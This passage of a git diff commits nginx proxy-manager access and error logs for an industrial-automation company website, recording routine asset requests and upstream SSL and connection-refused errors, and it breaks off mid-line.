Safari/537.36" "-" +[19/Feb/2026:04:04:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:04:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:04:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:04:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:04:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:04:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:04:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20864] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:04:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:04:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:04:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:04:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:04:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:07:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10001] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:04:07:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:07:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:07:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:07:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:07:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:07:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:07:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20864] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:07:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:07:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:07:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:07:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:07:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:11:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10753] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:04:11:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:11:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:11:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:11:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:11:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:11:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:11:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20864] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:11:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:11:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:11:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:11:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:11:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:04:11:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" diff --git a/npm/data/logs/proxy-host-1_error.log b/npm/data/logs/proxy-host-1_error.log index 70dc68d..3537d4e 100644 --- a/npm/data/logs/proxy-host-1_error.log +++ b/npm/data/logs/proxy-host-1_error.log @@ -1,650 +1,102 @@ -2026/02/14 22:37:21 [error] 261#261: *54 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.18.0.3:80/", host: "www.hanmocnn.co.kr" -2026/02/14 22:37:21 [error] 261#261: *54 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.18.0.3:80/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:50:21 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:50:21 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:50:21 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:50:21 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:50:21 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:50:21 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:50:21 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:50:21 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:50:32 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:50:32 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:50:32 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:50:32 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:50:32 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:50:32 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:50:32 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:50:32 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:51:08 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:51:08 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:51:08 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:51:08 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:51:08 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:51:08 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:51:08 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:51:08 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:53:09 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:53:09 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:53:09 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:53:09 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:53:09 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:53:09 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:53:09 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:53:09 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:53:23 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:53:23 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:53:23 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:53:23 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" -2026/02/14 22:53:23 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:53:23 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:53:23 [error] 236#236: *53 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:53:23 [warn] 236#236: *53 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/14 22:59:10 [error] 287#287: *132 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 91.231.89.123, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 22:59:10 [warn] 287#287: *132 upstream server temporarily disabled while SSL handshaking to upstream, client: 91.231.89.123, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 22:59:10 [error] 287#287: *132 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 91.231.89.123, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 22:59:10 [warn] 287#287: *132 upstream server temporarily disabled while SSL handshaking to upstream, client: 91.231.89.123, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:04:30 [error] 381#381: *368 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 91.196.152.153, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:04:30 [warn] 381#381: *368 upstream server temporarily disabled while SSL handshaking to upstream, client: 91.196.152.153, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://172.22.1.15:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:04:30 [error] 381#381: *368 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 91.196.152.153, server: hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "https://[fd4d:6169:6c63:6f77::14]:80/", host: "www.hanmocnn.co.kr" -2026/02/14 23:04:30 [warn] 